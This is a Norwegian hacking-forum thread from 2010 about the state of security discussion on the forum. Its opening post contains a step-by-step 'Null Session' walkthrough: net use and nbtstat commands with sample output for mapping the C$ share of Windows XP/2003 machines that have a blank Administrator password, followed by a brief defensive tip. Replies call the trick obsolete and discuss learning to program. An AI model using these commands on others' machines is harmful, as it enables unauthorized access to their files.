Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  7 1435
Freakforum var en gang i tiden et undergrunnsforum hvor man bortimot bare diskuterte hacking og datasikkerhet, fildeling, rusmiddel og pyroteknikk, men nå har det blomstret og blitt så mye mer. Skribenter som ranvik, som vet å gjøre det oldschool, og slashdot, med moralpreken og sine kjente ord om datasikkerhet gir forumet et stort hev, men jeg må ærlig si at den førstnevnte biten, hacking og datasikkerhet, er noe jeg savner mer av her inne, selv om at det fortsatt er et område som er aktivt og oppegående.

TipeX har tidligere skrevet en fin grunnlegende artikkel om hva hacking er og hva det går ut på, så for å hoppe over en del steg kan én lese denne artikkelen først dersom en er usikker - noe jeg sterkt tviler på.

Årsaken til at jeg tar opp denne debatten er fordi jeg vil se hvor mange som engasjerer seg i dette, hvor mange som har noe å si om området eller kanskje er eller har vært borti noe som kan være værdt å ta opp til diskusjon, samt at det ofte kommer sikkerhetsoppdateringer til operativsystemet i seg selv som skal tette nylig funnet hull - noe jeg kom til å tenke på når jeg tidligere i dag skrev litt om et litt eldre problem, eller en svakhet, i Windows som nesten gir hvem som helst tilgang til hva som helst på Pcen din (jeg har tatt dette med nedenfor som et eksempel på hva vi kan diskutere her inne)

PS! Selv om at sikkerhetshull er enkelt å utnytte er det ikke lov, så all bruk er på eget ansvar.


Null Session - ta kontroll
Type: Exploit / Sikkerhetshull / En svakhet i et program.
Forrord: Såfremt du vet IP på målmaskin kan du prøve dette. Vet du maskinnavn kan du kjøre én ping for å få IP-adressen opp. Dette fungerer ikke mot nyere operativsystem enn Windows XP eller Server 2003 - Vista og Win7 til eksempel tillater ikke bruk av Administrator bruker utenom sikkerhetsmodus, så der har de "løst" problemet. De som installerer XP har til vane å ikke taste inn passord på Administratorbrukeren, så den blir stående åpen og støver til noen benytter seg av den, slik som jeg har vist nå. Målmaskinen må også ha lagt til tjenesten for deling av filer, mapper og skrivere.

Hvordan.
Vi hyller vår gud: Command prompt. Og gir mye av æren til kommandoen NET som gir deg den tilgangen du søker, uten at vedkommende på målmaskinen vet noe om dette.

Se følgende eksempel:

Kode

C:\>net use \\målmaskin\IPC$ "" /u:""
Kommandoen er fullført.

C:\>net use * \\Målmaskin\c$
Passordet for \\Målmaskin\c$ er ugyldig.

Angi brukernavn for Målmaskin: Administrator
Angi passordet for Målmaskin: <blank>
Stasjon E: er nå koblet til \\Målmaskin\c$.

Kommandoen er fullført.
Så enkelt kan det være. Du kan altså teste annet enn c$ også, men dersom målmaskinen ikke har mer enn c-partisjon på PCen sin vil du ikke få tilgang til annet, men finns det får du full tilgang via nettverksstasjonen du har opprettet - skummelt, men sant.

Sjekk målmaskinen
Du kan se om målmaskin har tjenesten for deling av filer, mapper og skrivere aktivert ved å benytte "nbtstat -a målmaskin" eller "nbtstat -A IP". HEX 20 under type er betegnelsen på deling av filer, mapper og skrivere.

Kode

C:\>nbtstat -A IP

Lokal tilkobling:
Node-IP-adresse: [DIN_IP] Område-ID: []

Navnetabell for ekstern maskin for NetBIOS

Navn Type Status
----------------------------------------------
PCNAVN <20> UNIQUE Registrert
PCNAVN <00> UNIQUE Registrert
DOMENE/ARBEIDSGRUPPE <00> GROUP Registrert
DOMENE/ARBEIDSGRUPPE <1E> GROUP Registrert

MAC-adresse = 00-00-00-00-00-00
Dersom målmaskinen faktisk er sikret med passord på Administrator brukeren eller har endret navn på den (ja, det går an) kan du møte på problemstilling som dette.

Problemstilling

Kode

Systemfeil 1326 har oppstått.

Påloggingsfeil: ukjent brukernavn eller feil passord.
Din sikkerhet
Hvis du vil se hva du selv har delt kan du skrive net share, da ser du også alle hemmelige mapper/stasjoner (markert med $):

Kode

C:\>net share

Navn Ressurs Kommentar
-------------------------------------------------------------------------------
D$ D:\ Delt standardressurs
ADMIN$ C:\WINDOWS Ekstern administrasjon
C$ C:\ Delt standardressurs
IPC$ Ekstern IPC
Kommandoen er fullført.
Så bare se til at du har passord på brukeren administrator for å sikre deg at dette ikke skjer. Brannmur skal også være til hjelp, men man vet jo aldri.


Tilbake til poenget - kjør debatt!
Nå er jeg ærlig talt litt usikker på hva det er du vil debattere. Jeg kan ikke se at du har lagt ut noen problemstilling å ta tak i. Hva er det du vil, bare snakke generelt om diverse sikkerhetsaspekt? Det blir litt vagt for min del, fordi det inneholder mange forskjellige tema.

Er det snakk om kjappe howto's på hvordan utføre de mest grunnleggende kartleggingstekniker? Er det snakk om hvordan detektere og skrive exploits fra kildekodetolkning, eller fra ren reverse engineering? Er det snakk om nettverk og sikring av tjenester? Hvordan skrive shellcode, hooks, injections, etc?

Vil du prate generelt om hvorfor det er lite informasjon og/eller aktivitet og kvalitet rundt disse emnene? Grunnen til det er nok slik jeg ser det, mye av det samme problemet man finner i programmeringsforumet vårt. Takhøyden til brukergruppen virker rett og slett til å være for liten til å kunne ha skikkelig aktivitet der. Det går mye i grunnleggende programmeringsprinsipp og syntaksfeil, og ikke for å snakke om problemer som kunne vært løst med "prøv lykken"-funksjonen til Google.

I programmeringsforumet skulle jeg gjerne diskutert systemarkitektur, kunstig intelligens og algoritmer til krampa tok meg og jeg gulpet kattunger, men slik jeg ser det er det ikke så veldig mange å snakke med det om. Det samme blir det med forumet for datasikkerhet såvidt jeg kan se. Når terskelen stort sett ikke er større enn det å komme seg rundt en proxy eller finne ut passord fra en hash, vil følelsen av det å kaste perler for svin være noe overveldende.

Jeg vil forøvrig ikke akkurat kalle det eksemplet med å koble til et nettverksshare (bruk av NetBIOS og SMB) for noen form for hacking eller cracking, så jeg ser ikke helt hvorfor du har det med.
Sist endret av m0b; 19. februar 2010 kl. 17:25.
waf
Ocupado...
waf's Avatar
Trådstarter
Jeg vil egentlig kjøre én generell debatt rundt datasikkerhet: hvordan det var og hvordan det har utviklet seg, hva folk gjør per i dag og kanskje eksempler på hvor man kan starte dersom man er litt ny til dette - som meg.

Alle ser nok at du, som mange andre, har erfaring på området, og at du vet mer om hva det er å kjøre debatt om. Uansett hva vil jeg trekke debatten litt tilbake slik at de, som poengtert ovenfor, med mindre erfaring kan følge med og da kanskje finne et sted å starte.

Selv har jeg lite erfaring med programmering, så jeg forholder meg gjerne til sikkerhetshull og liknende enn så lenge, men så fort noe skjer kan det hende at jeg tar opp noe for å lære meg - det får tiden vise.

Fort ser jeg også problemstillingen når det ikke er mange å diskutere hva-enn-det-skulle-være med, så jeg vet ikke om jeg bare skal legge denne debatten til sides for nå, men igjen kan det være moro å bare se hva andre har å føye til i denne debatten - så jeg blir nok å holde meg her og følge med, ja.

For meg var det et sted å begynne, og det er jo en exploit, et sikkerhetshull, i Windows. Så på én måte føler jeg det relevant, selv om at jeg ser det fra din (mer erfarte) side.
Ja, misforstå meg ikke. Det var ikke meningen å verke snakke "ned" til deg eller andre som måtte ha liten eller ingen erfaring på området. Det jeg rett og slett lurte på var om du hadde noen konkret problemstilling til det som du ville diskutere.

Det som er en utfordring og en trend er at folk gjerne vil hacke/cracke og kommer over den utfordringen at for å kunne skjønne hva som gjøres må man gjerne skjønne hvordan minnet fungerer, og besitte kodeferdigheter. Det som jeg føler blir litt feil er at man kanskje ser litt på programmering fordi man ønsker å lære seg hacking. Når oppgaven å lære seg programmering blir for innsatskrevende, blir "hackerne" kun å bruke ferdigskrevne exploits og shellcode, og dermed havner under klassen scriptkiddie. Nå generaliserer jeg fryktelig, men det er en trend jeg synes å merke når begrep som hacking har nådd populærkulturen.

En mer naturlig prosess IMHO vil være å lære seg programmering skikkelig, og bruke dette aktivt til å oppnå ferdigheter som gjør at du kan både forstå hvordan og hvorfor en exploit fungerer. Da vil "hackerstatusen" til slutt falle mer naturlig fordi du da har konsentrert deg først og framst har satt det å lære seg å programmere som et hovedmål, og ikke som et delmål.

Kunnskap, interesse, kreativitet og hack value (Hvorfor finne opp hjulet pånytt? Fordi jeg kan.) er ting som går hånd i hånd her, og det kommer man stort sett ikke utenom når det kommer til slikt.
Sist endret av m0b; 19. februar 2010 kl. 18:00.
waf
Ocupado...
waf's Avatar
Trådstarter
Ah, store ord fra en vis mann. Dette skal man selvfølgelig takke for!

Jeg missforstår deg rett og vil bare påpeke at jeg ikke tar noe negativt, jeg trår faktisk inn på et område jeg har lite kjennskap til. Trår jeg feil ber jeg jo om det. Uansett vil alle tilbakemeldinger være til hjelp, så det er bare å fyre løs den som kan.

Jeg vet hvordan populærkulturen er og har vært lenge, og jeg føler ikke meg interessert til å falle derunder. Jeg har ikke interesse av programmering bare for å tukle med andres kildekoder til bruk av exploits m.m., da vil jeg heller sette meg inn og se hva exploiten gjør før jeg lager noe eget ut av det.

Når det gjelder helt basic er jeg mer interessert i å lære programmering fra grunn av, med noe ala c# eller liknende. Og jeg ser virkelig at man må kunne lære seg grunnprinsipp om hvordan ting fungerer, kanskje hvordan kommunikasjon mellom hard- og software fungerer.

Interesse har nok de fleste, men hvorvidt noen klarer å holde ut i opplærings fasen er noe annet. IMHO vil mange igjen bare hoppe av toget og holde seg med det de finner av hva andre har gjort, som du så fint påpeker og kaller scriptkiddies (noe de alltid vil være). Generaliseringen din støttes nok fullt ut, ja.

Men igjen må jeg påpeke at jeg ikke har noe spesifikk problemstilling å knytte til denne debatten. Den er kun ment for generell diskusjon, noe du allerede har valgt å fortsette med til tross for at det var for vagt for deg
skjønte ikke helt hva du prøver og diskutere her helt, veldig uklart og rotete. (være enn jeg pleier og være)
Den samba "hack" er ikke noe hack og funker ikke noe særlig siden alle har vista eller win7 og da er ikke dem default shares der noe mer. desuten så funker ikke det over inet. (siden ALLE(90%) isp'er har sperra samba over inet)

Etter tele2 skandalen har folk blitt mer redde for og poste ting, jeg har gått helt over til lan exploits(les router/wlan) som er hell eid av meg selv for det meste, som i gjen vil si det er ingen som kan ta meg for noen ting siden i følge dvd jon saken, så har du lov og bryte alt som er ditt egent.

destuen så har admins her ikke så veldig happy for paste password//login , den siste biten er for og beskyte brukern fra purken som følger med her inne.(siden det er public forum)
Merkelig tittel på tråden. Men jeg kunne tenkt meg mer diskusjon om hacking og datasikkerhet. Da det er et tema som jeg syns er veldig interessant.

Det er også veldig nyttig å lære seg, da det blir enklere å utvikle sikre løsninger siden man klarer å se hva som kan utnyttes og ikke.

Men jeg syns det er overraaskende få tråder om hacking her inne. Er det kanskje ikke så mange personer som interesserer seg for hacking her i Norge, og at det er litt for nerdete osv?
Sitat av melktrollet Vis innlegg
Men jeg syns det er overraaskende få tråder om hacking her inne. Er det kanskje ikke så mange personer som interesserer seg for hacking her i Norge, og at det er litt for nerdete osv?
Vis hele sitatet...

Kan også være at mange av de som starter med hacking gir opp så fort de finner ut at det ikke finnes et program som autmagisk hacker facebook.

Ellers vet jeg at mange nordmenn henger på flere av de utenlandske hack-forumene.
Og på flere av forumene finnes det jevnt over meget kompetente personer.

Kanskje verdt å sjekke ut noen av dem?